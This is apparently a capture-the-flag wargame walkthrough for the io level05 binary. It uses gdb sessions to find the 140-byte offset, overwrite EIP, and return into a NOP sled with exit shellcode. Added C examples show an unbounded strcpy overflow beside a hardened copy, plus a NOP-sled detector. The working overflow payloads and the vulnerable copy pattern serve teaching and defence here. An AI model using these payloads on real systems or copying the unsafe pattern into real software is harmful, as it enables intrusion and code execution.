Note: I won't be revealing the password for this level, as that's not allowed..

Let's now run it in GDB and exploit it :-

Code:

level5@io:/levels$ gdb ./level05
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb)

Now let's place a breakpoint at the beginning of the program and run it...

Code:

(gdb) break main
Breakpoint 1 at 0x80483bd

Let's run it with an argument of 160 A's..
We'll use a basic Python one-liner to build our attack string (the program's input)...

Code:

(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0x41414141 in ?? ()
(gdb)

Ok, it's pretty obvious that we have overwritten EIP with 0x41414141... (gdb reports that it cannot access memory at that address: 0x41414141 is an arbitrary value that isn't mapped in the program's user space, so the program cannot jump to it and faults..)

Now let's try a few different input lengths to get a basic picture of what's happening..

Code:

(gdb) run `python -c 'print"\x41"*140'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print"\x41"*140'`
Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Cannot access memory at address 0x41414145
(gdb)

Notice the address 0x41414145: with 140 A's the input reaches right up to the saved return address, so the next four bytes we write will land on EIP.

So to overwrite EIP with an address of our choosing, we end up with the following attack string :-

Code:

(gdb) run `python -c 'print"\x41"*140+"\x42"*4'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4'`
Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
0x42424242 in ?? ()

Boom... We have full control over the EIP overwrite...
Now we need to inject our shellcode and point EIP at it..
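The walkthrough never shows level05's source, so the code below is an added illustration written for this page, not the wargame's own code: the classic bug class that lets 140 bytes of input reach the saved return address (a fixed-size stack buffer filled with an unbounded strcpy), beside a hardened copy that refuses any input that does not fit. BUF_SIZE, the function names and the return convention are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed buffer size: level05's real size is not shown in the walkthrough,
 * which only tells us that 140 bytes of input reach the saved return address. */
#define BUF_SIZE 128

/* The vulnerable pattern (illustration, not the wargame's code): strcpy has no
 * bound, so an argument longer than the buffer runs over the saved EBP and the
 * saved return address, which is what puts 0x41414141 into EIP in gdb. */
void copy_arg_unsafe(char *dst, const char *src) {
    strcpy(dst, src);            /* no length check: this is the bug */
}

/* Hardened version: copies only if src plus its NUL fits in dst_size bytes;
 * otherwise leaves dst empty. Returns 1 on success, 0 on rejection. */
int copy_arg_safe(char *dst, size_t dst_size, const char *src) {
    size_t len = 0;
    if (dst_size == 0) return 0;
    while (len < dst_size && src[len] != '\0')   /* never reads past dst_size */
        len++;
    if (len >= dst_size) {       /* no room for the terminator: reject */
        dst[0] = '\0';
        return 0;
    }
    memcpy(dst, src, len + 1);
    return 1;
}

/* Builds an argument of n 'A's (the shape of the inputs used in gdb above) and
 * feeds it through the hardened copy. Returns 1 if accepted, 0 if rejected,
 * -1 if n is too large for the scratch buffer. */
int hardened_accepts(size_t n) {
    char arg[512];
    char buf[BUF_SIZE];
    if (n >= sizeof arg) return -1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return copy_arg_safe(buf, sizeof buf, arg);
}

int main(void) {
    size_t lengths[] = { 100, 127, 128, 140, 160 };
    for (size_t i = 0; i < sizeof lengths / sizeof lengths[0]; i++)
        printf("%zu A's: %s\n", lengths[i],
               hardened_accepts(lengths[i]) == 1 ? "accepted" : "rejected");
    return 0;
}
```

The hardened copy rejects 128 A's as well as 140 or 160, because the terminating NUL also has to fit; that one-byte margin is exactly where many "off by one" overflows come from.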

Let's first look at where our data goes..

Code:

(gdb) run `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`
Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCC
0x42424242 in ?? ()
(gdb) x/10bx $esp
0xbfffdc80: 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43
0xbfffdc88: 0x43 0x43
(gdb)

So ESP points straight at the bytes that follow the return address (0xbfffdc80 here), and there's plenty of room there.. We can place our shellcode at that spot and overwrite EIP with its address..

Lets do it!!

We'll again be using the same exit shellcode made in our previous article...

Code:

(gdb) run `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`
Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������1��#1۳̀
0xbfffdc80 in ?? ()
(gdb) continue
Continuing.
Program exited with code 07.
(gdb)

The NOP sled is simply a run of \x90 (nop) instructions; this instruction does nothing..
We use it to make our attack string more tolerant... the stack address shifts slightly with every new execution of the program, and without a NOP sled such a shift would make our attack string fail...
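As an added defender-side example (not part of the original walkthrough), the C code below applies the simplest NOP-sled heuristic an input filter or IDS rule uses: look for a long run of 0x90 bytes and report where it sits. The sample input is constructed here to mirror the walkthrough's layout (140 filler bytes, the address 0xbfffdc80, a 10-byte sled), with 0xcc placeholder bytes standing in for whatever follows the sled; the function names and the threshold are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Longest run of consecutive 0x90 (x86 nop) bytes in buf[0..n). If a run is
 * found and start is non-NULL, *start receives its offset. Returns the run
 * length, 0 when the buffer contains no 0x90 at all. */
size_t longest_nop_run(const unsigned char *buf, size_t n, size_t *start) {
    size_t best = 0, best_start = 0, cur = 0;
    for (size_t i = 0; i < n; i++) {
        if (buf[i] == 0x90) {
            cur++;
            if (cur > best) {
                best = cur;
                best_start = i + 1 - cur;   /* first byte of this run */
            }
        } else {
            cur = 0;
        }
    }
    if (start) *start = best_start;
    return best;
}

/* Sled heuristic: flag the input if its longest nop run is at least min_run
 * bytes. Returns 1 when flagged, 0 otherwise. min_run is a tuning choice. */
int looks_like_nop_sled(const unsigned char *buf, size_t n, size_t min_run) {
    return longest_nop_run(buf, n, NULL) >= min_run;
}

/* Constructed sample (not captured from the wargame) shaped like the
 * walkthrough's payload: 140 filler bytes, 0xbfffdc80 in little-endian
 * order, a 10-byte sled, then 0xcc placeholders standing in for whatever
 * would follow the sled. Returns the sample length, 0 if cap is too small. */
size_t build_sample(unsigned char *out, size_t cap) {
    const size_t total = 140 + 4 + 10 + 8;
    if (cap < total) return 0;
    memset(out, 'A', 140);
    out[140] = 0x80; out[141] = 0xdc; out[142] = 0xff; out[143] = 0xbf;
    memset(out + 144, 0x90, 10);
    memset(out + 154, 0xcc, 8);
    return total;
}

/* Runs the heuristic over the constructed sample. Returns the sled length
 * found; *start (if non-NULL) receives its offset. */
size_t sample_sled_length(size_t *start) {
    unsigned char buf[256];
    size_t n = build_sample(buf, sizeof buf);
    return longest_nop_run(buf, n, start);
}

/* Offset of the sled inside the constructed sample. */
size_t sample_sled_start(void) {
    size_t start = 0;
    sample_sled_length(&start);
    return start;
}

int main(void) {
    size_t start = 0;
    size_t len = sample_sled_length(&start);
    printf("longest nop run: %zu bytes at offset %zu (flagged at min_run 8: %s)\n",
           len, start, len >= 8 ? "yes" : "no");
    return 0;
}
```

A plain 0x90 count is only a first filter: a sled can be built from other single-byte instructions that also do nothing useful, so production detectors pair this check with disassembly of the suspected region rather than relying on the byte value alone.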